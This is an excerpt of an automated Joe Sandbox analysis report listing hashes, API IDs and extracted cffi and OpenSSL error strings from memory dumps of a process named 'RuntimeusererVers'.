                                                                                                                                                                                                                                          • Instruction ID: 9f6a4abf95ea59f6a29e2253df22603bd8b9d12eb537f3bfd7f185f7c57d2f4e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 029dc63bcb9701883aa7dfe738467c79b7938d4d54130a062ddd87817df6c006
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D541DB22A18E93C2E660DB15E848A796360FB98BF4F105331EA8E47665DF6CF5F4C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$DeallocOccurred$FormatObject_$ComplexComplex_DoubleFloat_Instance
                                                                                                                                                                                                                                          • String ID: cannot cast %.200s object to ctype '%s'$cannot cast ctype '%s' to ctype '%s'$cannot cast to ctype '%s'
                                                                                                                                                                                                                                          • API String ID: 3868323170-3297453605
                                                                                                                                                                                                                                          • Opcode ID: 26caa7f2b6ff196a14b3c065f7c36faba3bf28ba0d8ef3f0d7eee1367d9f97d0
                                                                                                                                                                                                                                          • Instruction ID: 64776d1994d5c1c52be46a083e04b7e8f492f467b27cec269691baa5caddc8a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 26caa7f2b6ff196a14b3c065f7c36faba3bf28ba0d8ef3f0d7eee1367d9f97d0
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AD14731A09E42C2EA698B15ED21AF9A3A1BF44BF8F580731EA4D06795DF3DF485C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Long_String$LongObject_Sign$DeallocErrorFatalFormatFuncInitMallocMaskOccurredUnsigned
                                                                                                                                                                                                                                          • String ID: an integer is required$cannot cast %s to ctype '%s'$integer conversion failed$unicode string of length %zd$write_raw_integer_data$write_raw_integer_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 3635145196-2788039420
                                                                                                                                                                                                                                          • Opcode ID: 74c0e292ea4c3fa60ad1e4ed9186d5f23d881c69bd2314c38fb66c2d3c10680d
                                                                                                                                                                                                                                          • Instruction ID: 30f43ab376c9557f5b80784c704785826aa39c564fd982fa8700e42a38c929a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 74c0e292ea4c3fa60ad1e4ed9186d5f23d881c69bd2314c38fb66c2d3c10680d
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 69712932A08E82C5EA688B15EC746F9A3A1BF85BF4F444735EA5E076A1DF2DF545C300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DeallocModule_$Dict_String$AttrDictFromItemObjectObject_Proxy_StateUnicode_strncmp
                                                                                                                                                                                                                                          • String ID: _constructors$openssl_
                                                                                                                                                                                                                                          • API String ID: 4166098000-3359357282
                                                                                                                                                                                                                                          • Opcode ID: ed79b93099806aafadb730f86885fd5ef4748fb5370365cbfc69fde869e87d1b
                                                                                                                                                                                                                                          • Instruction ID: d23bb413f65fd69d73f12aa6f9f78ca69cb5d5ecf1adfd908e4e1d098e5061ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed79b93099806aafadb730f86885fd5ef4748fb5370365cbfc69fde869e87d1b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 66411C65A09F0381EA66CB66B85893933A4BF49FF0B085635DE5D06794EF3CF8B58340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_String$Eval_Thread$Bytes_D_sizeDeallocFromLongLong_Module_OccurredPy_hashtable_getRestoreSaveSizeState
                                                                                                                                                                                                                                          • String ID: iteration value must be greater than 0.$key length must be greater than 0.$password is too long.$salt is too long.
                                                                                                                                                                                                                                          • API String ID: 3303125057-530160643
                                                                                                                                                                                                                                          • Opcode ID: c1e7765ffa051b0f152ba980d5732f7d5efbd93d88fee114a0c9a199d69447a7
                                                                                                                                                                                                                                          • Instruction ID: 9a79c0286172b08289243e91f0b8adab18fcd94f2b9e92f36dbc14cb1d25e047
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1e7765ffa051b0f152ba980d5732f7d5efbd93d88fee114a0c9a199d69447a7
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9411231A08F4386EA50DB25A84887963A1BB88FF4F544235DE5E43BA4DF3CF9A5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          • from_buffer('%s', ..): the actual length of the array cannot be computed, xrefs: 00007FF81E50D4DF
                                                                                                                                                                                                                                          • buffer is too small (%zd bytes) for '%s' (%zd bytes), xrefs: 00007FF81E50D47C
                                                                                                                                                                                                                                          • expected a pointer or array ctype, got '%s', xrefs: 00007FF81E50D3A1
                                                                                                                                                                                                                                          • from_buffer() cannot return the address of a unicode object, xrefs: 00007FF81E50D3CF
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: buffer is too small (%zd bytes) for '%s' (%zd bytes)$expected a pointer or array ctype, got '%s'$from_buffer('%s', ..): the actual length of the array cannot be computed$from_buffer() cannot return the address of a unicode object
                                                                                                                                                                                                                                          • API String ID: 4212644371-2010142110
                                                                                                                                                                                                                                          • Opcode ID: ef7f4258a6f1742f4329201d90d72ae64c6c4c89f3e130c1c84caf5f35619e59
                                                                                                                                                                                                                                          • Instruction ID: 3f763662ec8c6caad212243754d33fbcb30098e756e59556a87016f9205b1bba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ef7f4258a6f1742f4329201d90d72ae64c6c4c89f3e130c1c84caf5f35619e59
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F351F231A08E42C6EA189B26E8642BC67A0FB88FE4F440636EE4E47764DF7DF455C341
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatLong_OccurredSsize_t$String
                                                                                                                                                                                                                                          • String ID: cdata of type '%s' cannot be indexed$index too large (expected %zd <= %zd)$negative index$slice start > stop$slice start must be specified$slice stop must be specified$slice with step not supported
                                                                                                                                                                                                                                          • API String ID: 564475518-3973974439
                                                                                                                                                                                                                                          • Opcode ID: 95ccda1fc6cf6bda1526cd47267b32ab986f9531830adfb689bdf902bdfd7de6
                                                                                                                                                                                                                                          • Instruction ID: fc6c27ad4020514cc479acfcf7c72ba6fc94a91fae7d8216b0c52a8d7e221761
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 95ccda1fc6cf6bda1526cd47267b32ab986f9531830adfb689bdf902bdfd7de6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 59410631A09E12C1EA188B16EC701B823A0FB48BF5F644735EA5E47B94DFBDF5548310
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dict_Err_FormatItem$DeallocUnicode_
                                                                                                                                                                                                                                          • String ID: or $cdata object$ctype object$expected a %s%s%s%s%s, got '%.200s'$string$the type '%s%s' is a function type, not a pointer-to-function type$unexpected symbol
                                                                                                                                                                                                                                          • API String ID: 3047486896-3137146848
                                                                                                                                                                                                                                          • Opcode ID: b0ea932004fc0e138c00b9e84c2baca81b98b7ce76cbeb65d4866bc5b432d885
                                                                                                                                                                                                                                          • Instruction ID: 04acbda34aa85d8f177511b22f2d6d8810b017c25218449463999e4b0bd0a7a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0ea932004fc0e138c00b9e84c2baca81b98b7ce76cbeb65d4866bc5b432d885
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 16815872A09F8285EB548B11EC602F963A1FB44BE4F994236DA4E47794DF7DF884C350
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Dealloc$AttrObject_StringTuple_$Err_FormatImportImport_ModuleSubtypeType_
                                                                                                                                                                                                                                          • String ID: ffi$lib$while loading %.200s: failed to import ffi, lib from %.200s
                                                                                                                                                                                                                                          • API String ID: 1456096276-3368324463
                                                                                                                                                                                                                                          • Opcode ID: b285fc8c6686346b44a2067672e026e6991b14ec3d5d8e8446825c80dc18a2aa
                                                                                                                                                                                                                                          • Instruction ID: aa53818f3ffa8898830a2407f6f2951ed0a5f7029ab75ce382b573191a535342
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b285fc8c6686346b44a2067672e026e6991b14ec3d5d8e8446825c80dc18a2aa
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D411A25A0AF4285EA5ACF56ED642B963E0BF48BE0F098631DE6E43751EF3DF4448300
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Buffer_$Arg_$ArgumentBufferContiguousObject_Release$KeywordsUnpack
                                                                                                                                                                                                                                          • String ID: argument 'key'$argument 'msg'$contiguous buffer$hmac_digest
                                                                                                                                                                                                                                          • API String ID: 3345984100-3409375717
                                                                                                                                                                                                                                          • Opcode ID: 5845a12e731993df909c334ade5d379dbbea437c27d36fd20dbefa8c412e903a
                                                                                                                                                                                                                                          • Instruction ID: e0dd3e0b62a05baa4c2a9e8f1537f54f8a416e5fdeed0c272f834ce701788048
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5845a12e731993df909c334ade5d379dbbea437c27d36fd20dbefa8c412e903a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AF518022E08FC781EA20CB21E845BB9A360FB957E8F405235DA8D06665EF7CF5E4C740
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1577633708.00007FF81E081000.00000020.00000001.01000000.0000003C.sdmp, Offset: 00007FF81E080000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577554084.00007FF81E080000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577633708.00007FF81E0F4000.00000020.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1577887521.00007FF81E0F6000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578021546.00007FF81E119000.00000008.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578087716.00007FF81E11D000.00000004.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E11E000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E124000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578182269.00007FF81E12B000.00000002.00000001.01000000.0000003C.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e080000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: X509_$E_free$E_dupL_sk_findL_sk_pushL_sk_set_cmp_funcM_read_bio_O_freeR_clear_errorR_put_errorX509X509_freeX509_get_subject_name
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\ssl_cert.c
                                                                                                                                                                                                                                          • API String ID: 2219757170-349359282
                                                                                                                                                                                                                                          • Opcode ID: 1e1f9dd6e5152399bcdfbe9d4da830f0128aad489989312af23f95d94710bd58
                                                                                                                                                                                                                                          • Instruction ID: 68cde3ae7fb42a84b24da18e2d73ede667cfc89cb1ccb359a914a25c46596391
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1e1f9dd6e5152399bcdfbe9d4da830f0128aad489989312af23f95d94710bd58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B9316D51F0DE4A42FE14AF629411ABA63A1BF85BE4F444235FD4D47BC6DE2CF8469700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1578637831.00007FF81E131000.00000020.00000001.01000000.0000003B.sdmp, Offset: 00007FF81E130000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578429679.00007FF81E130000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578694735.00007FF81E13D000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578785676.00007FF81E14E000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1578942677.00007FF81E14F000.00000008.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579030056.00007FF81E154000.00000004.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1579098759.00007FF81E155000.00000002.00000001.01000000.0000003B.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e130000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: String$Bytes_DeallocErr_M_read_bio_Module_O_ctrlO_freeO_newO_s_fileStateX509X509_free
                                                                                                                                                                                                                                          • String ID: Can't malloc memory to read file$Can't open file$Error decoding PEM-encoded file
                                                                                                                                                                                                                                          • API String ID: 2561677103-2145957498
                                                                                                                                                                                                                                          • Opcode ID: adbad0fb0f886cb832970ebedc5e61f4f856221bfcb736068abb08ec0d86a742
                                                                                                                                                                                                                                          • Instruction ID: 9b548b2248c1dd141c7856c16d81657a67fe8f3b3a785f7c5fdc4a520a0b010e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: adbad0fb0f886cb832970ebedc5e61f4f856221bfcb736068abb08ec0d86a742
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4D212825A09F4282FA259B16A95517973A2FF85FF3B885230DE0E07B68DF3CF4958304
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1582033096.00007FF81E4E1000.00000020.00000001.01000000.00000037.sdmp, Offset: 00007FF81E4E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1581472246.00007FF81E4E0000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582460342.00007FF81E4E7000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582744405.00007FF81E4EC000.00000004.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1582953118.00007FF81E4EE000.00000002.00000001.01000000.00000037.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e4e0000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$Format$R_clear_errorR_func_error_stringR_lib_error_stringR_peek_last_errorR_reason_error_stringString
                                                                                                                                                                                                                                          • String ID: [%s: %s] %s$[%s] %s$no reason supplied
                                                                                                                                                                                                                                          • API String ID: 748225740-1501659929
                                                                                                                                                                                                                                          • Opcode ID: 82da3d0729b56764fb311f0fa50c5dc3a1a12c3df0ac9ada4c836ae88c5692b8
                                                                                                                                                                                                                                          • Instruction ID: 2440df00267c0b6dc892c274a4ad242b51e24c3f504131e7cb49b2e0e923ef44
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 82da3d0729b56764fb311f0fa50c5dc3a1a12c3df0ac9ada4c836ae88c5692b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8D211A65A08F43C6EA19DB55B8088A963A5AF85FF1F184231DA4E06B64EF3CF5E5C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Err_$FormatString
                                                                                                                                                                                                                                          • String ID: [%llu]$array item of unknown size: '%s'$array size would overflow a Py_ssize_t$first arg must be a pointer ctype
                                                                                                                                                                                                                                          • API String ID: 4212644371-2481730993
                                                                                                                                                                                                                                          • Opcode ID: 05dfea99fca8e7e3f8418aea05a6bea39033f92f21fa4c5841987fd2d62bd480
                                                                                                                                                                                                                                          • Instruction ID: fc02b55cf01b5c88a14288505ed4b6b945ea4055c3aebb94a1439ce87dc930f6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 05dfea99fca8e7e3f8418aea05a6bea39033f92f21fa4c5841987fd2d62bd480
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D515B72608F86C5EA54DF11E8647A973A8FB88BE4F490235EA8E47758DF3CE145C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_48_2_7ff81e500000_RuntimeusererVers.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: LongLong_
                                                                                                                                                                                                                                          • String ID: int() not supported on cdata '%s'$read_raw_float_data$read_raw_float_data: bad float size$read_raw_signed_data$read_raw_signed_data: bad integer size
                                                                                                                                                                                                                                          • API String ID: 1954241474-3524632987
                                                                                                                                                                                                                                          • Opcode ID: 4ea6b68c8146bc11f6a93356a52cfd34eefb6cabb11a49e7c3f584f4e5c84db4
                                                                                                                                                                                                                                          • Instruction ID: 9cf9db18647a1e04f64c93e5a3f7545de6191f7abc2e14a2178ce762e52c70a6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4ea6b68c8146bc11f6a93356a52cfd34eefb6cabb11a49e7c3f584f4e5c84db4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DB512236E08E06C1EA6C8B19DCA51B823A1FB85BF5F544635E90D07764DE3DF586C700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000030.00000002.1583070422.00007FF81E501000.00000020.00000001.01000000.00000036.sdmp, Offset: 00007FF81E500000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583033638.00007FF81E500000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583104278.00007FF81E51C000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583140748.00007FF81E529000.00000004.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000030.00000002.1583198579.00007FF81E52F000.00000002.00000001.01000000.00000036.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
